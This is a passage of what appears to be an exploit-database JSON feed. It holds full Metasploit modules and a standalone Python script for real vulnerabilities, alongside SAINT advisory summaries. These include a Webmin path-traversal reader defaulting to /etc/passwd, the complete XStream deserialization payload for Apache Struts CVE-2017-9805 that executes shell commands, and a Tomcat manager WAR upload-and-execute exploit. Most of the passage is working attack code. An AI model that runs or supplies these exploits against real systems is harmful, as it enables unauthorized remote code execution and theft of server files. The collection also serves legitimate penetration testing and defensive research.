URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).\n", "modified": "2020-05-12T20:15:21", "published": "2008-01-06T22:02:01", "id": "MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "href": "", "type": "metasploit", "title": "Webmin File Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Webmin File Disclosure',\n 'Description' => %q{\n A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '26772'],\n ['BID', '18744'],\n ['CVE', '2006-3392'],\n ['US-CERT-VU', '999601'],\n ['URL', 'http://secunia.com/advisories/20892/'],\n ],\n 'DisclosureDate' => 'Jun 30 2006',\n 'Actions' =>\n [\n ['Download', 'Description' => 'Download arbitrary file']\n ],\n 'DefaultAction' => 'Download'\n ))\n\n register_options(\n [\n Opt::RPORT(10000),\n OptString.new('RPATH',\n [\n true,\n \"The file to download\",\n \"/etc/passwd\"\n ]\n ),\n OptString.new('DIR',\n [\n true,\n \"Webmin directory path\",\n \"/unauthenticated\"\n ]\n ),\n ])\n end\n\n def run\n print_status(\"Attempting to retrieve #{datastore['RPATH']}...\")\n\n dir = normalize_uri(datastore['DIR'])\n uri = Rex::Text.uri_encode(dir) + \"/..%01\" * 40 + Rex::Text.uri_encode(datastore['RPATH'])\n\n res = send_request_raw({\n 'uri' => uri,\n }, 10)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n print(res.body)\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/webmin/file_disclosure.rb"}, {"lastseen": "2020-05-31T00:47:48", "bulletinFamily": "exploit", "description": "Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, using the REST plugin, are vulnerable to a Java deserialization attack in the XStream library.\n", "modified": "2019-07-10T15:58:03", "published": "2017-09-06T01:12:08", "id": "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM", "href": "", "type": "metasploit", "title": "Apache Struts 2 REST Plugin XStream RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 REST Plugin XStream RCE',\n 'Description' => %q{\n Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12,\n using the REST plugin, are vulnerable to a Java deserialization attack\n in the XStream library.\n },\n 'Author' => [\n 'Man Yue Mo', # Vulnerability discovery\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2017-9805'],\n ['URL', 'https://struts.apache.org/docs/s2-052.html'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],\n ['URL', 'https://github.com/mbechler/marshalsec']\n ],\n 'DisclosureDate' => '2017-09-05',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'python', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n ['Unix (In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Windows (In-Memory)',\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_memory\n ],\n ['Python (In-Memory)',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :py_memory\n ],\n ['PowerShell (In-Memory)',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_memory\n ],\n ['Linux (Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n ['Windows (Dropper)',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3'])\n ])\n end\n\n def check\n return CheckCode::Appears if execute_command(rand_str)\n\n CheckCode::Safe\n end\n\n def exploit\n case target['Type']\n when /memory/\n execute_command(payload.encoded)\n when /dropper/\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, opts = {})\n cmd =\n case target['Type']\n when :unix_memory, :linux_dropper\n %W{/bin/sh -c #{cmd}}\n when :py_memory\n %W{python -c #{cmd}}\n when :psh_memory\n if payload\n cmd_psh_payload(\n cmd,\n payload.arch.first,\n remove_comspec: true,\n encode_final_payload: true\n ).split\n else\n %W{powershell.exe -c #{cmd}}\n end\n when :win_memory, :win_dropper\n %W{cmd.exe /c #{cmd}}\n end\n\n # Encode each command argument with XML entities\n cmd.map! { |arg| arg.encode(xml: :text) }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'ctype' => 'application/xml',\n 'data' => xstream_payload(cmd)\n )\n\n return false unless check_response(res)\n\n true\n end\n\n # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO\n def xstream_payload(cmd)\n # XXX: <spillLength> and <read> need to be removed for Windows\n <<EOF\n<map>\n <entry>\n <jdk.nashorn.internal.objects.NativeString>\n <flags>0</flags>\n <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n <dataHandler>\n <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n <is class=\"javax.crypto.CipherInputStream\">\n <cipher class=\"javax.crypto.NullCipher\">\n <initialized>false</initialized>\n <opmode>0</opmode>\n <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"javax.imageio.spi.FilterIterator\">\n <iter class=\"java.util.Collections$EmptyIterator\"/>\n <next class=\"java.lang.ProcessBuilder\">\n <command>\n <string>#{cmd.join('</string><string>')}</string>\n </command>\n <redirectErrorStream>false</redirectErrorStream>\n </next>\n </iter>\n <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n <method>\n <class>java.lang.ProcessBuilder</class>\n <name>start</name>\n <parameter-types/>\n </method>\n <name>#{rand_str}</name>\n </filter>\n <next class=\"string\">#{rand_str}</next>\n </serviceIterator>\n <lock/>\n </cipher>\n <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n <ibuffer></ibuffer>\n <done>false</done>\n <ostart>0</ostart>\n <ofinish>0</ofinish>\n <closed>false</closed>\n </is>\n <consumed>false</consumed>\n </dataSource>\n <transferFlavors/>\n </dataHandler>\n <dataLen>0</dataLen>\n </value>\n </jdk.nashorn.internal.objects.NativeString>\n <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n <entry>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n </entry>\n</map>\nEOF\n end\n\n def check_response(res)\n res && res.code == 500 && res.body.include?(error_string)\n end\n\n def error_string\n 'java.lang.String cannot be cast to java.security.Provider$Service'\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_rest_xstream.rb"}], "saint": [{"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-18T00:00:00", "published": "2010-06-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "id": "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-18T00:00:00", "published": "2010-06-18T00:00:00", "id": "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-06-18T00:00:00", "published": "2010-06-18T00:00:00", "id": "SAINT:88789BF22A82B3B79355F9F1C375C644", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "title": "HP Operations Manager hidden Tomcat account", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:22", "bulletinFamily": "exploit", "description": "Added: 09/08/2017 \nCVE: [CVE-2017-9805](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805>) \nBID: [100609](<http://www.securityfocus.com/bid/100609>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe REST plugin in Apache Struts uses `**XStreamHandler**` with an instance of XStream for deserialization without any type filtering, allowing a remote, unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) to Apache Struts 2.3.34 or 2.5.13 or higher. \n\n### References\n\n<https://struts.apache.org/docs/s2-052.html> \n<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html> \n\n\n### Limitations\n\nExploit works on Struts 2.5.10 running on Linux. \n\n### Platforms\n\nWindows \nLinux \nLinux x64 \n \n\n", "modified": "2017-09-08T00:00:00", "published": "2017-09-08T00:00:00", "id": "SAINT:49062325B1FAB54D731E4C8FBF78D940", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_rest_plugin_xstream", "title": "Apache Struts REST plugin XStream deserialization vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 09/08/2017 \nCVE: [CVE-2017-9805](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805>) \nBID: [100609](<http://www.securityfocus.com/bid/100609>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\n### Problem\n\nThe REST plugin in Apache Struts uses `**XStreamHandler**` with an instance of XStream for deserialization without any type filtering, allowing a remote, unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi>) to Apache Struts 2.3.34 or 2.5.13 or higher. \n\n### References\n\n<https://struts.apache.org/docs/s2-052.html> \n<http://blog.talosintelligence.com/2017/09/apache-struts-being-exploited.html> \n\n\n### Limitations\n\nExploit works on Struts 2.5.10 running on Linux. \n\n### Platforms\n\nWindows \nLinux \nLinux x64 \n \n\n", "modified": "2017-09-08T00:00:00", "published": "2017-09-08T00:00:00", "id": "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_rest_plugin_xstream", "title": "Apache Struts REST plugin XStream deserialization vulnerability", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:34", "bulletinFamily": "exploit", "description": "", "modified": "2010-02-19T00:00:00", "published": "2010-02-19T00:00:00", "href": "https://packetstormsecurity.com/files/86448/Apache-Tomcat-Manager-Application-Deployer-Upload-and-Execute.html", "id": "PACKETSTORM:86448", "type": "packetstorm", "title": "Apache Tomcat Manager Application Deployer Upload and Execute", "sourceData": "`## \n# $Id: tomcat_mgr_deploy.rb 8552 2010-02-18 18:18:43Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Tomcat Manager Application Deployer Upload and Execute', \n'Description' => %q{ \nThis module can be used to execute a payload on Apache Tomcat servers that \nhave an exposed \"manager\" application. The payload is uploaded as a WAR archive \ncontaining a jsp application using a PUT request. \n \nThe manager application can also be abused using /manager/html/upload, but that \nmethod is not implemented in this module. \n}, \n'Author' => [ 'jduck' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 8552 $', \n'References' => \n[ \n# There is no single vulnerability associated with deployment functionality. \n# Instead, the focus has been on insecure/blank/hardcoded default passwords. \n \n# The following references refer to HP Operations Manager \n[ 'CVE', '2009-3843' ], \n[ 'OSVDB', '60317' ], \n \n# tomcat docs \n[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] \n], \n'Platform' => [ 'win' ], \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('PATH', [ true, \"The URI path of the manager app (/deploy and /undeploy will be used)\", '/manager']) \n], self.class) \nend \n \n \ndef exploit \n \n# TODO: autodetect arch/platform from /manager/serverinfo and/or db notes \narch = ARCH_X86 \nplat = [Msf::Module::Platform::Windows] \n \n# Generate the WAR containing the EXE containing the payload \njsp_name = rand_text_alphanumeric(4+rand(32-4)) \nwar = Msf::Util::EXE.to_jsp_war(framework, \narch, plat, \npayload.encoded, \n:jsp_name => jsp_name) \n \napp_base = rand_text_alphanumeric(4+rand(32-4)) \napp_name = app_base + \".war\" \nquery_str = \"?path=/\" + app_base \n \n# \n# UPLOAD \n# \npath_tmp = datastore['PATH'] + \"/deploy\" + query_str \nprint_status(\"Uploading #{war.length} bytes as #{app_name}...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'PUT', \n'ctype' => 'application/octet-stream', \n'data' => war, \n}, 20) \nif (! res) \nraise RuntimeError, \"Upload failed on #{path_tmp} [No Response]\" \nend \nif (res.code < 200 or res.code >= 300) \ncase res.code \nwhen 401 \nprint_error(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") \nend \nraise RuntimeError, \"Upload failed on #{path_tmp} [#{res.code} #{res.message}]\" \nend \n \n \n# \n# EXECUTE \n# \nprint_status(\"Executing #{app_base}...\") \nres = send_request_cgi({ \n'uri' => '/' + app_base + '/' + jsp_name + '.jsp', \n'method' => 'GET' \n}, 20) \n \nif (! res) \nprint_error(\"Execution failed on #{app_base} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Execution failed on #{app_base} [#{res.code} #{res.message}]\") \nend \n \n \n# \n# DELETE \n# \npath_tmp = datastore['PATH'] + \"/undeploy\" + query_str \nprint_status(\"Undeploying #{app_base} ...\") \nres = send_request_cgi({ \n'uri' => path_tmp, \n'method' => 'GET' \n}, 20) \nif (! res) \nprint_error(\"WARNING: Undeployment failed on #{path} [No Response]\") \nelsif (res.code < 200 or res.code >= 300) \nprint_error(\"Deletion failed on #{path} [#{res.code} #{res.message}]\") \nend \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/86448/tomcat_mgr_deploy.rb.txt"}, {"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144050/Apache-Struts-2.5.12-XStream-Remote-Code-Execution.html", "id": "PACKETSTORM:144050", "title": "Apache Struts 2.5.12 XStream Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE \n# Google Dork: filetype:action \n# Date: 06/09/2017 \n# Exploit Author: Warflop \n# Vendor Homepage: https://struts.apache.org/ \n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip \n# Version: Struts 2.5 a Struts 2.5.12 \n# Tested on: Struts 2.5.10 \n# CVE : 2017-9805 \n \n#!/usr/bin/env python3 \n# coding=utf-8 \n# ***************************************************** \n# Struts CVE-2017-9805 Exploit \n# Warflop (http://securityattack.com.br/) \n# Greetz: Pimps & G4mbl3r \n# ***************************************************** \nimport requests \nimport sys \n \ndef exploration(command): \n \nexploit = ''' \n<map> \n<entry> \n<jdk.nashorn.internal.objects.NativeString> \n<flags>0</flags> \n<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"> \n<dataHandler> \n<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"> \n<is class=\"javax.crypto.CipherInputStream\"> \n<cipher class=\"javax.crypto.NullCipher\"> \n<initialized>false</initialized> \n<opmode>0</opmode> \n<serviceIterator class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"java.util.Collections$EmptyIterator\"/> \n<next class=\"java.lang.ProcessBuilder\"> \n<command> \n<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string> \n</command> \n<redirectErrorStream>false</redirectErrorStream> \n</next> \n</iter> \n<filter class=\"javax.imageio.ImageIO$ContainsFilter\"> \n<method> \n<class>java.lang.ProcessBuilder</class> \n<name>start</name> \n<parameter-types/> \n</method> \n<name>foo</name> \n</filter> \n<next class=\"string\">foo</next> \n</serviceIterator> \n<lock/> \n</cipher> \n<input class=\"java.lang.ProcessBuilder$NullInputStream\"/> \n<ibuffer/> \n<done>false</done> \n<ostart>0</ostart> \n<ofinish>0</ofinish> \n<closed>false</closed> \n</is> \n<consumed>false</consumed> \n</dataSource> \n<transferFlavors/> \n</dataHandler> \n<dataLen>0</dataLen> \n</value> \n</jdk.nashorn.internal.objects.NativeString> \n<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n<entry> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n</map> \n''' \n \n \nurl = sys.argv[1] \n \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0', \n'Content-Type': 'application/xml'} \n \nrequest = requests.post(url, data=exploit, headers=headers) \nprint request.text \n \nif len(sys.argv) < 3: \nprint ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE') \nprint ('[*] Warflop - http://securityattack.com.br') \nprint ('[*] Greatz: Pimps & G4mbl3r') \nprint ('[*] Use: python struts2.py URL COMMAND') \nprint ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id') \nexit(0) \nelse: \nexploration(sys.argv[2]) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144050/apachestruts25-exec.txt"}, {"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144034/Apache-Struts-2-REST-Plugin-XStream-Remote-Code-Execution.html", "id": "PACKETSTORM:144034", "title": "Apache Struts 2 REST Plugin XStream Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 REST Plugin XStream RCE', \n'Description' => %q{ \nApache Struts versions 2.5 through 2.5.12 using the REST plugin are \nvulnerable to a Java deserialization attack in the XStream library. \n}, \n'Author' => [ \n'Man Yue Mo', # Vulnerability discovery \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2017-9805'], \n['URL', 'https://struts.apache.org/docs/s2-052.html'], \n['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], \n['URL', 'https://github.com/mbechler/marshalsec'] \n], \n'DisclosureDate' => 'Sep 5 2017', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'python', 'linux', 'win'], \n'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n['Unix (In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD \n], \n['Python (In-Memory)', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON \n], \n['PowerShell (In-Memory)', \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64] \n], \n['Linux (Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64] \n], \n['Windows (Dropper)', \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64] \n] \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'ctype' => 'application/xml', \n'data' => random_crap \n) \n \nif res && res.code == 500 && res.body.include?('xstream') \nCheckCode::Appears \nelse \nCheckCode::Safe \nend \nend \n \ndef exploit \ncase target.name \nwhen /Unix/, /Python/, /PowerShell/ \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, opts = {}) \ncase target.name \nwhen /Unix/, /Linux/ \ncmd = %W{/bin/sh -c #{cmd}} \nwhen /Python/ \ncmd = %W{python -c #{cmd}} \nwhen /PowerShell/ \n# This shit doesn't work yet \nrequire 'pry'; binding.pry \ncmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} \nwhen /Windows/ \ncmd = %W{cmd.exe /c #{cmd}} \nend \n \n# Encode each command argument with HTML entities \ncmd.map! { |arg| Rex::Text.html_encode(arg) } \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'ctype' => 'application/xml', \n'data' => xstream_payload(cmd) \n) \nend \n \n# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO \ndef xstream_payload(cmd) \n# XXX: <spillLength> and <read> need to be removed for Windows \n<<EOF \n<map> \n<entry> \n<jdk.nashorn.internal.objects.NativeString> \n<flags>0</flags> \n<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"> \n<dataHandler> \n<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"> \n<is class=\"javax.crypto.CipherInputStream\"> \n<cipher class=\"javax.crypto.NullCipher\"> \n<initialized>false</initialized> \n<opmode>0</opmode> \n<serviceIterator class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"java.util.Collections$EmptyIterator\"/> \n<next class=\"java.lang.ProcessBuilder\"> \n<command> \n<string>#{cmd.join('</string><string>')}</string> \n</command> \n<redirectErrorStream>false</redirectErrorStream> \n</next> \n</iter> \n<filter class=\"javax.imageio.ImageIO$ContainsFilter\"> \n<method> \n<class>java.lang.ProcessBuilder</class> \n<name>start</name> \n<parameter-types/> \n</method> \n<name>#{random_crap}</name> \n</filter> \n<next class=\"string\">#{random_crap}</next> \n</serviceIterator> \n<lock/> \n</cipher> \n<input class=\"java.lang.ProcessBuilder$NullInputStream\"/> \n<ibuffer></ibuffer> \n<done>false</done> \n<ostart>0</ostart> \n<ofinish>0</ofinish> \n<closed>false</closed> \n</is> \n<consumed>false</consumed> \n</dataSource> \n<transferFlavors/> \n</dataHandler> \n<dataLen>0</dataLen> \n</value> \n</jdk.nashorn.internal.objects.NativeString> \n<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n<entry> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n</map> \nEOF \nend \n \ndef random_crap \nRex::Text.rand_text_alphanumeric(rand(42) + 1) \nend \n \nend \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144034/struts2_rest_xstream.rb.txt"}, {"lastseen": "2018-04-19T09:07:42", "bulletinFamily": "exploit", "description": "", "modified": "2018-04-17T00:00:00", "published": "2018-04-17T00:00:00", "href": "https://packetstormsecurity.com/files/147247/Drupalgeddon2-Drupal-Remote-Code-Execution.html", "id": "PACKETSTORM:147247", "title": 